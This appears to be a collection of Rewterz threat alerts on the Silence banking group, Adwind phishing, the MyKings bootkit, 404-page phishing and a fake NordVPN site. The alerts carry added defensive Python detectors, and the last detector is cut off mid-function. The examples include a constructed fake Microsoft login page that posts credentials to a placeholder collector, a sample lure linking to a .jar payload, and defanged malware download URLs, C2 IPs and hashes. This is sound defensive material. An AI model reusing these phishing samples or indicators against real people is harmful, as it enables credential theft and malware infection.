
Rewterz Threat Alert – Banks All over the World Attacked by Silence Advanced Hackers

Severity

High

Analysis Summary

The advanced hacker group Silence has increased its activity significantly over the past year. Its victims in the financial sector are scattered across more than 30 countries, and financial losses have quintupled. Active since 2016, Silence drew attention after its first attacks on victims failed; since then it has managed to steal at least $4.2 million, initially from banks in the former Soviet Union and later from victims in Europe, Latin America, Africa, and Asia.

Tools and Tactics

The researchers say that Silence has improved its operational security and changed its toolset to thwart detection. Apart from rewriting the first-stage module (Silence.Downloader / Truebot), the group began using a PowerShell-based fileless loader called Ivoke.

For lateral movement in the victim network, a new PowerShell agent is used, called EmpireDNSAgent (EDA) because it is based on the recently abandoned Empire framework and the dnscat2 project.
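Because EDA inherits dnscat2's transport, its traffic looks like DNS rather than like a remote-access tool, so the place to look for it is the resolver log. The following is an added example written for this alert, not code from Rewterz or from the Silence toolset: it scores each registrable domain in a DNS query log on three signals that dnscat2-style tunnels produce (subdomains that never repeat, high-entropy labels, and a preference for TXT/CNAME/MX records) and flags a domain only when at least two signals fire. The log format, thresholds and the sample records are all constructed for the example.

```python
import math
from collections import defaultdict

# Constructed DNS query records for this example ("client qtype qname"),
# not captured traffic. The c2-tunnel.example names mimic dnscat2-style
# traffic: one-off hex labels under a single parent, mostly TXT queries.
SAMPLE_DNS_LOG = """\
10.0.0.5 A www.example.com
10.0.0.5 A cdn.example.net
10.0.0.7 TXT 2b9a1c0e7f3d5a8b4c6e9f1a2b3c4d5e.c2-tunnel.example
10.0.0.7 TXT 7f3a9c1e5b2d8a4f6c0e2b9d1a3f5c7e.c2-tunnel.example
10.0.0.7 CNAME 9e1d3b5f7a2c4e6a8b0d2f4c6e8a1b3d.c2-tunnel.example
10.0.0.7 TXT 4c6e8a0b2d4f6a8c1e3b5d7f9a2c4e6b.c2-tunnel.example
10.0.0.7 TXT 1a3b5c7d9e2f4a6b8c0d2e4f6a8b0c1d.c2-tunnel.example
10.0.0.7 TXT 8d0f2a4c6e8b1d3f5a7c9e2b4d6f8a0c.c2-tunnel.example
10.0.0.5 A mail.example.com
10.0.0.5 A www.example.com
10.0.0.5 A www.example.com
10.0.0.5 A cdn.example.com
10.0.0.5 A mail.example.com
"""

# Record types that carry free-form or large answers; dnscat2 favours TXT,
# CNAME and MX over the A/AAAA lookups that dominate normal traffic.
DATA_CARRYING_TYPES = {"TXT", "CNAME", "MX", "NULL"}


def shannon_entropy(text):
    """Bits per character: hex payloads approach 4.0, real hostnames stay far lower."""
    if not text:
        return 0.0
    counts = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registrable_domain(qname):
    # Assumption for the demo: the last two labels are the registrable domain.
    # Production code should consult the public suffix list (co.uk and friends).
    labels = qname.rstrip(".").split(".")
    return ".".join(labels[-2:])


def subdomain_part(qname, base):
    qname = qname.rstrip(".")
    return qname[: -len(base) - 1] if len(qname) > len(base) else ""


def score_dns_log(log_text, min_queries=5, unique_ratio=0.8, min_entropy=3.5, data_ratio=0.5):
    """Return {domain: [reasons]} for domains showing at least two tunnelling signals."""
    stats = defaultdict(lambda: {"queries": 0, "subdomains": set(), "data_queries": 0, "entropy_sum": 0.0})
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue
        _client, qtype, qname = parts
        base = registrable_domain(qname)
        sub = subdomain_part(qname, base)
        s = stats[base]
        s["queries"] += 1
        s["subdomains"].add(sub)
        s["entropy_sum"] += shannon_entropy(sub.replace(".", ""))
        if qtype.upper() in DATA_CARRYING_TYPES:
            s["data_queries"] += 1

    findings = {}
    for base, s in stats.items():
        if s["queries"] < min_queries:      # too little data to judge
            continue
        reasons = []
        uniq = len(s["subdomains"]) / s["queries"]
        ent = s["entropy_sum"] / s["queries"]
        data = s["data_queries"] / s["queries"]
        if uniq >= unique_ratio:
            reasons.append(f"{uniq:.0%} of queries use a never-repeated subdomain")
        if ent >= min_entropy:
            reasons.append(f"mean subdomain entropy {ent:.2f} bits/char")
        if data >= data_ratio:
            reasons.append(f"{data:.0%} of queries are TXT/CNAME/MX/NULL")
        if len(reasons) >= 2:               # two independent signals cut false positives
            findings[base] = reasons
    return findings


if __name__ == "__main__":
    for domain, reasons in score_dns_log(SAMPLE_DNS_LOG).items():
        print(domain, "->", "; ".join(reasons))
```

Content-delivery and anti-spam domains also generate many unique subdomains, which is why a single signal is not enough; in a real deployment, allow-list those domains and tune the thresholds on a week of your own resolver logs before alerting.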

In October 2018, Silence started to send out reconnaissance emails that would help better prepare an attack. Such a message would carry no payload and pretended to be an automated reply for a failed delivery.


The purpose was to receive an updated list of active email addresses from the target. Silence sent out over 170,000 of these emails during three separate campaigns against victims in Asia, Europe, and post-Soviet countries.

The recon campaign on financial institutions in Europe was the smallest one, with less than 10,000 emails delivered. The focus was on British financial companies.
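The recon mail described above gives the defender two things to look for: a burst of messages to mailboxes that do not exist (the attacker learns which addresses are live from what the mail server rejects) and "failed delivery" notices arriving for mail that nobody in the organisation ever sent. The following is an added example written for this alert, not code from Rewterz or from any mail product: it runs both checks over a constructed inbound SMTP log and a constructed record of recent outbound mail. The log format, field names, thresholds and addresses are assumptions made for the example.

```python
from collections import defaultdict

# Constructed inbound SMTP log for this example, one record per RCPT TO:
# time|source ip|envelope sender|recipient|our server's reply code|subject
# 550 = our MTA rejected an unknown mailbox, 250 = accepted for delivery.
INBOUND_LOG = """\
2018-10-02T09:00:01|203.0.113.10|mailer-daemon@mx.example.org|alice@bank.example|250|Undeliverable: Payment confirmation
2018-10-02T09:00:02|203.0.113.10|mailer-daemon@mx.example.org|bob@bank.example|250|Undeliverable: Payment confirmation
2018-10-02T09:00:02|203.0.113.10|mailer-daemon@mx.example.org|old.user@bank.example|550|Undeliverable: Payment confirmation
2018-10-02T09:00:03|203.0.113.10|mailer-daemon@mx.example.org|jsmith@bank.example|550|Undeliverable: Payment confirmation
2018-10-02T09:00:03|203.0.113.10|mailer-daemon@mx.example.org|ops@bank.example|550|Undeliverable: Payment confirmation
2018-10-02T09:00:04|203.0.113.10|mailer-daemon@mx.example.org|hr2014@bank.example|550|Undeliverable: Payment confirmation
2018-10-02T09:00:04|203.0.113.10|mailer-daemon@mx.example.org|carol@bank.example|250|Undeliverable: Payment confirmation
2018-10-02T09:05:00|198.51.100.7|partner@supplier.example|alice@bank.example|250|Re: invoice 1187
2018-10-02T09:06:00|198.51.100.9|mailer-daemon@supplier.example|alice@bank.example|250|Mail delivery failed: returning message to sender
"""

# Constructed outbound history: (local sender, remote domain) pairs we really
# sent mail to recently. A genuine bounce can only follow one of these.
OUTBOUND_PAIRS = {("alice@bank.example", "supplier.example")}

# Real bounces come from the null return path <> or a mailer-daemon/postmaster
# address; forged ones imitate that, so the subject is checked as well.
BOUNCE_LOCALPARTS = {"mailer-daemon", "postmaster", ""}
BOUNCE_SUBJECT_WORDS = ("undeliverable", "delivery failed", "delivery status", "returned mail")


def parse_log(text):
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src_ip, sender, rcpt, code, subject = line.split("|", 5)
        records.append({"ts": ts, "src_ip": src_ip, "sender": sender.lower(),
                        "rcpt": rcpt.lower(), "code": int(code), "subject": subject})
    return records


def detect_harvest(records, min_unknown=3, min_ratio=0.5):
    """Sources that probe many non-existent mailboxes: directory-harvest behaviour."""
    per_src = defaultdict(lambda: [0, 0])          # src_ip -> [unknown recipients, total]
    for r in records:
        per_src[r["src_ip"]][1] += 1
        if r["code"] == 550:
            per_src[r["src_ip"]][0] += 1
    return {ip: (unk, tot) for ip, (unk, tot) in per_src.items()
            if unk >= min_unknown and unk / tot >= min_ratio}


def looks_like_bounce(r):
    localpart = r["sender"].split("@")[0]
    subject = r["subject"].lower()
    return localpart in BOUNCE_LOCALPARTS or any(w in subject for w in BOUNCE_SUBJECT_WORDS)


def detect_unsolicited_bounces(records, outbound_pairs):
    """Accepted bounce-looking mail whose recipient never wrote to the bouncing domain."""
    hits = []
    for r in records:
        if r["code"] != 250 or not looks_like_bounce(r):
            continue
        sender_domain = r["sender"].split("@")[-1]
        if (r["rcpt"], sender_domain) not in outbound_pairs:
            hits.append((r["rcpt"], r["sender"], r["src_ip"]))
    return hits


if __name__ == "__main__":
    recs = parse_log(INBOUND_LOG)
    print("harvest sources:", detect_harvest(recs))
    print("unsolicited bounces:", detect_unsolicited_bounces(recs, OUTBOUND_PAIRS))
```

The harvest check is cheap and should run on the edge MTA's logs; the bounce correlation needs the outbound log from the same period, which is where the 170,000-message campaigns described above would have stood out as bounces with no originating message.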


After validating email addresses, the threat actor moves to the next stages of the attack and starts sending out messages with a payload that downloads Silence-specific malware.

Persistence and lateral movement follow, using self-developed tools or binaries already available on the target system.

In the final stage, the attacker reaches the card processing machines and can control ATMs using its Atmosphere trojan or a program called ‘xfs-disp.exe’ to dispense cash to money mules at specific times.

Impact

Financial loss

Remediation

  • Always be suspicious about emails sent by unknown senders.
  • Never click on links or attachments sent by unknown senders.
  • Treat "failed delivery" notices for mail your organisation never sent as suspicious; Silence uses them to validate live addresses.
  • Monitor DNS logs for tunnelling patterns (high-entropy subdomains, heavy TXT/CNAME/MX query volume), since EDA moves laterally over DNS.

Rewterz Threat Alert – Adwind Bypasses Microsoft ATP to Attack Utilities Industry

Severity

Medium

Analysis Summary

A phishing campaign is delivering Adwind (also known as JRAT or SockRat) to the utilities industry, with national grid infrastructure as its primary target. Adwind is sold as malware-as-a-service (MaaS) for a subscription fee. Its functions include taking screenshots, harvesting credentials from browsers (Chrome, IE, and Edge), webcam access, audio recording, file transfer, collecting system and user information, stealing VPN certificates, and keylogging.

The email is sent from a compromised account at Friary Shoes and asks the recipient to open the attached PDF, sign it, and return the signed copy. The "attachment" is not a file at all: it is a JPG of a PDF icon wrapped in a link that points to the initial payload, a JAR file that requires Java to run. Clicking on the "attachment" starts the download and execution. Once running, Adwind connects to its command and control (CnC) server and sends the harvested information back to it. Popular anti-virus software and analysis tools are disabled by using taskkill.exe.
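The lure described above depends on a mail client rendering an image-only hyperlink so that it passes for an attachment. That structure is visible in the message body and can be checked before delivery. The following is an added example written for this alert, not code from Rewterz or from the Adwind authors: it parses an HTML body, collects every anchor with its visible text and wrapped images, and flags anchors that are image-only and point at an executable type (.jar among them) or whose text promises a PDF while the target is something else. The sample message, the placeholder IP and the extension list are constructed for the example.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse
import posixpath

# Extensions that execute when opened; .jar needs only an installed Java runtime.
PAYLOAD_EXTENSIONS = {".jar", ".exe", ".scr", ".js", ".jse", ".vbs", ".vbe", ".wsf",
                      ".hta", ".bat", ".cmd", ".ps1", ".msi", ".lnk", ".iso", ".zip"}

# Constructed message body for this example; the IP and paths are placeholders,
# not indicators from the campaign.
SAMPLE_EMAIL_HTML = """
<p>Please open the attached document, sign it and return the signed copy.</p>
<a href="http://203.0.113.25/documents/Scan_0042.jar"><img src="http://203.0.113.25/img/pdf_icon.jpg" alt="Scan_0042.pdf"></a>
<p>Kind regards</p>
<a href="https://www.example.com/privacy">Privacy policy</a>
<a href="http://203.0.113.25/download?id=7">Invoice_2019.pdf</a>
"""


class LinkExtractor(HTMLParser):
    """Collects every <a>: its href, its visible text and any <img> it wraps."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "a":
            self._current = {"href": attrs.get("href") or "", "text": "", "images": []}
        elif tag == "img" and self._current is not None:
            self._current["images"].append(attrs.get("src") or "")

    def handle_data(self, data):
        if self._current is not None:
            self._current["text"] += data

    def handle_endtag(self, tag):
        if tag == "a" and self._current is not None:
            self.links.append(self._current)
            self._current = None


def url_extension(url):
    """Extension of the URL path only, so query strings and fragments do not hide it."""
    return posixpath.splitext(urlparse(url).path)[1].lower()


def find_disguised_payload_links(html):
    parser = LinkExtractor()
    parser.feed(html)
    parser.close()
    findings = []
    for link in parser.links:
        ext = url_extension(link["href"])
        text = link["text"].strip().lower()
        if link["images"] and not text and ext in PAYLOAD_EXTENSIONS:
            # An icon with no caption whose target executes: the Adwind "attachment" pattern.
            findings.append(("image-only link to executable payload", link["href"]))
        elif ".pdf" in text and ext != ".pdf":
            findings.append(("link text claims a PDF but target ends with %r" % (ext or "no extension"),
                             link["href"]))
    return findings


if __name__ == "__main__":
    for reason, href in find_disguised_payload_links(SAMPLE_EMAIL_HTML):
        print(f"{reason}: {href}")
```

A mail gateway that already rewrites links can run this on the decoded HTML part; when the link target is a redirector rather than the file itself, resolve the redirect chain first and feed the final URL to url_extension().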

Impact

Credential theft

Indicators of Compromise

IP(s) / Hostname(s)

  • 109[.]203[.]124[.]231
  • 194[.]5[.]97[.]28

Malware Hash (MD5/SHA1/SHA256)

  • 0b7b52302c8c5df59d960dd97e3abdaf
  • 6b94046ac3ade886488881521bfce90f
  • 781fb531354d6f291f1ccab48da6d39f
  • 7f97f5f336944d427c03cc730c636b8f
  • a4e510d903f05892d77741c5f4d95b5d
  • c17b03d5a1f0dc6581344fd3d67d7be1

Remediation

  • Block all threat indicators at your respective controls.
  • Always be suspicious about emails sent by unknown senders.
  • Never click on the link/attachments sent by unknown senders.

Rewterz Threat Alert – MyKings Variant With Bootloader Persistence

Severity

High

Analysis Summary

Trend Micro published a blog post analyzing a variant of the MyKings botnet malware that includes a new bootloader persistence mechanism. The threat was originally detected through EternalBlue exploitation activity, which MyKings uses to propagate laterally. Upon installation, MyKings establishes persistence through several methods, including registry Run keys, scheduled tasks, and WMI objects. This most recent variant extends that with a bootloader component: the bootkit alters kernel-level functions so that the malicious code runs on every startup and cleaning up the infection becomes far harder. These persistence mechanisms drive a chain of actions whose end goal is downloading additional payloads. One of the main payload types distributed by MyKings is cryptocurrency miners, which generate profit for the botnet operators.
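A bootkit that survives the usual cleanup of Run keys, scheduled tasks and WMI subscriptions has to live somewhere the operating system does not routinely inspect, and on a legacy-BIOS machine the first place to look is the boot sector. The following is an added example written for this alert and is not taken from the Trend Micro analysis or from the MyKings code: it parses a 512-byte MBR, hashes the 440-byte bootstrap area, and compares it with a hash recorded on a known-clean host, while also returning the partition table so an analyst can see whether the infection left that intact (as bootkits that chain-load the original code must). The sample sectors, including the simulated infection, are constructed for the example.

```python
import hashlib
import struct

SECTOR_SIZE = 512
BOOT_CODE_LEN = 440            # bootstrap code; bytes 440-443 = disk signature, 444-445 reserved
PARTITION_TABLE_OFFSET = 446   # four 16-byte entries
BOOT_SIGNATURE = b"\x55\xaa"   # bytes 510-511


def parse_mbr(sector):
    """Return bootstrap hash, disk signature and the non-empty partition entries."""
    if len(sector) != SECTOR_SIZE:
        raise ValueError("expected one 512-byte sector")
    if sector[510:512] != BOOT_SIGNATURE:
        raise ValueError("missing 0x55AA boot signature")
    partitions = []
    for i in range(4):
        off = PARTITION_TABLE_OFFSET + 16 * i
        status, ptype, lba_start, sectors = struct.unpack_from("<B3xB3xII", sector, off)
        if ptype != 0:
            partitions.append({"index": i, "bootable": status == 0x80, "type": ptype,
                               "lba_start": lba_start, "sectors": sectors})
    return {
        "boot_code_sha256": hashlib.sha256(sector[:BOOT_CODE_LEN]).hexdigest(),
        "disk_signature": struct.unpack_from("<I", sector, 440)[0],
        "partitions": partitions,
    }


def check_boot_code(sector, baseline_sha256):
    """(matches_baseline, parsed_info); a mismatch with an unchanged partition table is the bootkit signature."""
    info = parse_mbr(sector)
    return info["boot_code_sha256"] == baseline_sha256, info


def build_mbr(boot_code, disk_signature, entries):
    """Constructed test sector; real ones are read from the disk device (see usage note)."""
    code = boot_code.ljust(BOOT_CODE_LEN, b"\x00")[:BOOT_CODE_LEN]
    table = b"".join(entries).ljust(64, b"\x00")
    return code + struct.pack("<IH", disk_signature, 0) + table + BOOT_SIGNATURE


# One bootable NTFS (type 0x07) partition starting at LBA 2048, 204800 sectors long.
NTFS_ENTRY = struct.pack("<B3sB3sII", 0x80, b"\x20\x21\x00", 0x07, b"\xfe\xff\xff", 2048, 204800)
# Typical opening of a BIOS MBR (xor ax,ax / mov ss,ax / mov sp,0x7c00 ...); constructed for the example.
CLEAN_CODE = bytes.fromhex("33c08ed0bc007c8ec08ed8be007cbf0006b90002fcf3a450681c06cbfbb90400")
CLEAN_MBR = build_mbr(CLEAN_CODE, 0x1A2B3C4D, [NTFS_ENTRY])
BASELINE_SHA256 = hashlib.sha256(CLEAN_MBR[:BOOT_CODE_LEN]).hexdigest()

# Simulated bootkit: only the first instruction is patched into a jump that would
# divert to the attacker's loader; the partition table is left exactly as it was.
INFECTED_CODE = bytes.fromhex("e900") + CLEAN_CODE[2:]
INFECTED_MBR = build_mbr(INFECTED_CODE, 0x1A2B3C4D, [NTFS_ENTRY])


if __name__ == "__main__":
    for name, sector in (("clean", CLEAN_MBR), ("infected", INFECTED_MBR)):
        ok, info = check_boot_code(sector, BASELINE_SHA256)
        print(f"{name}: baseline match={ok}, partitions={info['partitions']}")
```

To run this against a real disk, read the first 512 bytes of the raw device as an administrator (on Windows open r"\\.\PhysicalDrive0" in binary mode; on Linux /dev/sda) and record BASELINE_SHA256 from a freshly imaged machine of the same build. UEFI systems that boot from GPT carry only a protective MBR and never execute its code, so there the equivalent check belongs on the EFI system partition's boot manager files.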

Impact

Exposure of sensitive information

Indicators of Compromise

URLs

  • http[:]//js.mykings[.]top:280/helloworld[.]msi
  • hxxp[:]//js[.]mykings.top:280/v[.]sc

Malware Hash (MD5/SHA1/SHA256)

  • e8ddefd237646a47debc01df9aa02fbcae40686f96b7860511c73798c7546201
  • 7a4f2f2702fababb0619556e67a41d0a09e01fbfdb84d47b4463decdbb360980
  • d5f907f9d2001ee5013c4c1af965467714bbc0928112e54ba35d142c8eab68bf
  • 790c213e1227adefd2d564217de86ac9fe660946e1240b5415c55770a951abfd
  • 80f8ba7992a5dbaa4a2f76263258d5d7bf3bb8994f9e8a4a5294f70ab8e38ea4
  • ab26a859633d1ec68e021226fab47870ed78fc2e6a58c70a7a7060be51247c1d
  • a3bb132ab1ba3e706b90d6fb514504105f174c4e444e87be7bce1995f798044d
  • 79bcb0b7ba00c4c65bf9b41cfe193fd917d92ab1d41456ac775836cec5cadc9a
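The indicator lists in this alert and in the Adwind alert above are published defanged, and not consistently so (compare the two MyKings URLs), while the hash heading covers three algorithms without saying which each entry is. Before "blocking at your respective controls" the indicators have to be refanged, typed and routed to the right control. The following is an added example written for these alerts, not a Rewterz tool: it refangs the common notations, classifies each value as MD5/SHA-1/SHA-256 by length, IPv4 address, URL or domain, and builds per-control blocklists, adding each URL's host to the domain list. The sample input is the indicators exactly as they appear in the two alerts above.

```python
import re
from urllib.parse import urlparse

HASH_ALGORITHMS = {32: "md5", 40: "sha1", 64: "sha256"}   # hex digest lengths


def refang(ioc):
    """Undo the usual defanging: hxxp -> http, [.] -> ., [:] -> :, [@] -> @."""
    s = ioc.strip()
    s = re.sub(r"^hxxp", "http", s, flags=re.IGNORECASE)
    for defanged, real in (("[.]", "."), ("(.)", "."), ("[:]", ":"), ("[@]", "@"), ("[://]", "://")):
        s = s.replace(defanged, real)
    return s


def classify(ioc):
    """Return (kind, normalised value); hashes are lower-cased, domains lower-cased, URLs kept as-is."""
    s = refang(ioc)
    if re.fullmatch(r"[0-9a-fA-F]+", s) and len(s) in HASH_ALGORITHMS:
        return HASH_ALGORITHMS[len(s)], s.lower()
    if re.fullmatch(r"(?:\d{1,3}\.){3}\d{1,3}", s) and all(int(o) <= 255 for o in s.split(".")):
        return "ipv4", s
    if re.match(r"^[a-z][a-z0-9+.-]*://", s, re.IGNORECASE):
        return "url", s
    if re.fullmatch(r"[a-z0-9-]+(?:\.[a-z0-9-]+)*\.[a-z]{2,}", s, re.IGNORECASE):
        return "domain", s.lower()
    return "unknown", s


def build_blocklists(iocs):
    """Group indicators by the control that consumes them; each URL also yields its host."""
    lists = {k: set() for k in ("md5", "sha1", "sha256", "ipv4", "url", "domain", "unknown")}
    for ioc in iocs:
        kind, value = classify(ioc)
        lists[kind].add(value)
        if kind == "url":
            host = urlparse(value).hostname
            if host:
                lists["domain"].add(host)     # DNS/proxy blocks need the host, not the full URL
    return lists


# Indicators copied from the Adwind and MyKings alerts above, defanging left as published.
PAGE_IOCS = [
    "109[.]203[.]124[.]231",
    "194[.]5[.]97[.]28",
    "0b7b52302c8c5df59d960dd97e3abdaf",
    "http[:]//js.mykings[.]top:280/helloworld[.]msi",
    "hxxp[:]//js[.]mykings.top:280/v[.]sc",
    "e8ddefd237646a47debc01df9aa02fbcae40686f96b7860511c73798c7546201",
]

if __name__ == "__main__":
    for kind, values in build_blocklists(PAGE_IOCS).items():
        if values:
            print(f"{kind}: {sorted(values)}")
```

Anything that lands in "unknown" should be reviewed by hand rather than dropped; a truncated hash or a hostname with a typo is the usual cause, and a silently ignored indicator is a control gap.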

Remediation

  • Block all threat indicators at your respective controls.
  • Apply the MS17-010 update that closes the SMBv1 flaw exploited by EternalBlue, and restrict SMB (TCP 445) between network segments, since that is how MyKings spreads laterally.
  • Audit persistence locations beyond the usual ones: registry Run keys, scheduled tasks, WMI event subscriptions, and the boot sector itself.
  • Always be suspicious about emails sent by unknown senders.
  • Never click on links or attachments sent by unknown senders.

Rewterz Threat Intelligence Report 2019

Karachi, Pakistan – August 20, 2019 – Rewterz, a boutique information security company, today announced the release of the annual Threat Intelligence Report 2019. The report is compiled from data gathered through our advanced intelligence gathering platform that Rewterz has developed to identify cyberattacks. The report aims to provide the latest analysis of methods used by attackers to compromise data.

Rewterz Threat Intelligence Report 2019 includes the findings of our Security Operation Center (SOC) teams, which monitored and identified cyberattacks. Our team also analyzed global cyber security threats through our threat intelligence gathering platform to bring forth this valuable real-time data and equip organizations against cyberattacks beforehand. The impact of such attacks on an organization can be huge, ranging from disruption of critical operations to extreme financial losses. Therefore, to cope with the growing techniques of cyber-crime, our SOC team uses the most advanced threat intelligence and manages real-time data on the threat landscape through our Security Orchestration, Automation and Response (SOAR) platform, SIRP. Through this report, we aim to share and disseminate knowledge about sophisticated threats and advanced attacker practices in use on the Internet today. This report enables readers to gain clear insight into the nature of the threats currently faced by organizations operating in the cyber world.

Based on data collected from our attack sensors, the key findings of attacks towards Pakistan include:

  • The largest share of attacks originated from IP space in the USA and Russia.
  • 40% of the detected cyberattacks targeted Port 443 (HTTPS).
  • Most of the critical vulnerabilities were found in web servers.
  • Windows Installer Package (MSI) execution was the delivery method behind the largest number of distinct malware families, while WannaCry remains the most frequently seen ransomware.
  • About 40% of malicious emails are spam, whereas 29% attempt credential theft by redirecting to phishing sites.
  • Breaching of online transactions continues to be a major threat vector.
  • 28.9% of the cyberattacks are directed towards payment services.
  • Apache Struts 2 ParametersInterceptor remote command execution was the most common exploit detected.
  • More than half of the web application attacks were Illegal Resource Access attempts.

To view a full copy of the Rewterz Threat Intelligence 2019 report, please visit: Rewterz Threat Intelligence Report 2019

Rewterz Threat Advisory – Malicious Custom 404 Pages Used in Phishing Attacks

Severity

Medium

Analysis Summary

Microsoft security researchers discovered an unusual phishing campaign which employs custom 404 error pages to trick potential victims into handing out their Microsoft credentials.

To do this, the attackers register a domain and instead of creating a single phishing landing page to redirect their victims to, they configure a custom 404 page which shows the fake login form.

This gives the phishers an effectively unlimited supply of phishing landing-page URLs from a single registered domain: any path that does not exist on the server, which is every path, serves the fake login form. Blocklists built from individual URLs therefore never catch up; the domain itself has to be blocked.

The 404 Not Found page tells you that you’ve hit a broken or dead link.

Phishing landing page

The custom 404 error pages these attackers use to harvest their victims’ credentials are perfectly camouflaged as legitimate Microsoft account sign-in pages, down to the smallest details.

All the links on the phishing page, including the ones at the bottom and the ones used to access one’s Microsoft account and to create a new one, are directing straight to official Microsoft login forms in an effort to make targets less suspicious.

The only elements missing from the phishing page are the “Sign-in options” link above the “Next” button and the cookies notification at the top of the page.
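The technique above has a signature a defender can test for directly: a request for a random path that cannot exist should produce a plain error page, and if it instead returns a login form the host is serving the phish from its 404 handler. The following is an added example written for this advisory, not code from Microsoft's researchers: it inspects one HTTP response and reports a credential form served with a 404 status, a form that posts to a host other than the page's own, and a page whose links all point off-site (the trust-building trick described above). The sample pages, the placeholder form-collector IP and field names, and the probe helper are constructed for the example.

```python
from collections import Counter
from html.parser import HTMLParser
from urllib.parse import urlparse


class PageInspector(HTMLParser):
    """Records forms (action + whether they take a password) and the host of every link."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._form = None
        self.link_hosts = Counter()

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self._form = {"action": attrs.get("action") or "", "has_password": False}
        elif tag == "input" and self._form is not None:
            if (attrs.get("type") or "text").lower() == "password":
                self._form["has_password"] = True
        elif tag == "a":
            # Relative links have no host and count as same-site ("").
            self.link_hosts[(urlparse(attrs.get("href") or "").hostname or "").lower()] += 1

    def handle_endtag(self, tag):
        if tag == "form" and self._form is not None:
            self.forms.append(self._form)
            self._form = None


def assess_response(status, html, page_host):
    """Findings for one HTTP response; an empty list means nothing phish-like was seen."""
    p = PageInspector()
    p.feed(html)
    p.close()
    page_host = page_host.lower()
    findings = []
    cred_forms = [f for f in p.forms if f["has_password"]]
    if status == 404 and cred_forms:
        findings.append("HTTP 404 response carries a credential form: every bad path on this host is a login page")
    for f in cred_forms:
        target = (urlparse(f["action"]).hostname or page_host).lower()
        if target != page_host:
            findings.append(f"credential form posts to {target}, not to {page_host}")
    off_site = {h: n for h, n in p.link_hosts.items() if h and h != page_host}
    if off_site and len(off_site) == len(p.link_hosts):
        findings.append("all %d links point off-site (%s): trust borrowed from the real brand"
                        % (sum(off_site.values()), ", ".join(sorted(off_site))))
    return findings


def fetch_unknown_path(host, scheme="https", timeout=10):
    """Request a random non-existent path and return (status, body) for assess_response()."""
    import secrets
    import urllib.error
    import urllib.request
    url = f"{scheme}://{host}/{secrets.token_urlsafe(12)}"
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as e:          # 404 arrives here, body intact
        return e.code, e.read().decode("utf-8", "replace")


# Constructed response bodies for this example; hosts and field names are placeholders.
FAKE_LOGIN_404 = """<html><head><title>Sign in to your account</title></head><body>
<form method="post" action="https://203.0.113.40/collect.php">
  <input type="email" name="loginfmt" placeholder="Email, phone, or Skype">
  <input type="password" name="passwd">
  <input type="submit" value="Next">
</form>
<a href="https://login.microsoftonline.com/">Can't access your account?</a>
<a href="https://signup.live.com/">No account? Create one!</a>
<a href="https://www.microsoft.com/privacy">Privacy statement</a>
</body></html>"""

PLAIN_404 = """<html><body><h1>404 Not Found</h1>
<p>The page you requested does not exist.</p><a href="/">Home</a></body></html>"""

if __name__ == "__main__":
    print(assess_response(404, FAKE_LOGIN_404, "phish-example.test"))
    print(assess_response(404, PLAIN_404, "phish-example.test"))
```

In practice the probe is run against a host reported in a phishing email: fetch_unknown_path() returns the status and body, assess_response() turns them into findings, and a positive result justifies blocking the whole domain rather than the one URL that was reported.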

Impact

Credential theft

Affected Vendors

Microsoft

Remediation

  • Always be suspicious about emails sent by unknown senders.
  • Never click on links or attachments sent by unknown senders.
  • Check the address bar before entering credentials: a Microsoft sign-in form on any domain other than Microsoft's own is a phish, however faithful it looks.
  • Block the phishing domain rather than individual URLs, since every non-existent path on it serves the fake form.
  • Enforce multi-factor authentication so that a harvested password alone does not grant access.

Rewterz Threat Alert – Fake NordVPN Website Used by Hackers to Deliver Banking Trojan

Severity

Medium

Analysis Summary

Hackers are actively distributing the Win32.Bolik.2 banking Trojan via the nord-vpn[.]club website, an almost perfect clone of the official nordvpn[.]com site of the popular NordVPN service.

Cloned NordVPN website

The cloned website also has a valid SSL certificate issued by the open certificate authority Let's Encrypt on August 3, with an expiration date of November 1. The padlock this produces proves only that the operators control nord-vpn[.]club, not that they are NordVPN; domain-validated certificates are free and issued automatically to anyone who controls a domain. Win32.Bolik.2 is an improved version of Win32.Bolik.1 and has the qualities of a multicomponent polymorphic file virus.

Using this malware, the attackers can perform web injections, intercept traffic, log keystrokes and steal information from different bank-client systems. The operators launched this campaign on August 8 and are focusing on English-speaking targets; according to the researchers, thousands of people have already visited nord-vpn[.]club in search of a download link for the NordVPN client.

A cocktail of banking trojans and information stealers—Win32.Bolik.2 and Trojan.PWS.Stealer.26645 (Predator The Thief)—was also delivered to their targets by the same hacker group behind this malware campaign with the help of two other cloned websites in late June 2019.
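nord-vpn[.]club differs from the real domain only by a hyphen and a TLD, which is exactly the kind of variation a brand-protection check should catch before users see search results for it. The following is an added example written for this alert, not a Rewterz or NordVPN tool: it normalises the registrable label of a candidate domain (hyphens removed, common digit and letter-pair look-alikes folded), then flags domains whose label equals, is one edit from, or embeds a protected brand while not being one of the brand's legitimate domains. nordvpn[.]com is taken from the alert as the legitimate domain; the other candidates, the homoglyph table and the edit-distance threshold are assumptions made for the example.

```python
# Brand labels we protect and the domains legitimately theirs. nordvpn.com is named in the
# alert as the real site; the structure is an assumption for the example.
PROTECTED = {"nordvpn": {"nordvpn.com"}}

# Characters attackers swap for look-alikes; folded before comparing.
HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "7": "t", "8": "b"})
MULTI_CHAR = (("rn", "m"), ("vv", "w"), ("cl", "d"))


def registrable_label(domain):
    # Assumption: the second-level label carries the brand (use a public-suffix list for co.uk etc.).
    labels = domain.lower().rstrip(".").split(".")
    return labels[-2] if len(labels) >= 2 else labels[0]


def normalize(label):
    s = label.replace("-", "").translate(HOMOGLYPHS)
    for pair, single in MULTI_CHAR:
        s = s.replace(pair, single)
    return s


def levenshtein(a, b):
    """Classic edit distance (insert/delete/substitute), O(len(a)*len(b))."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
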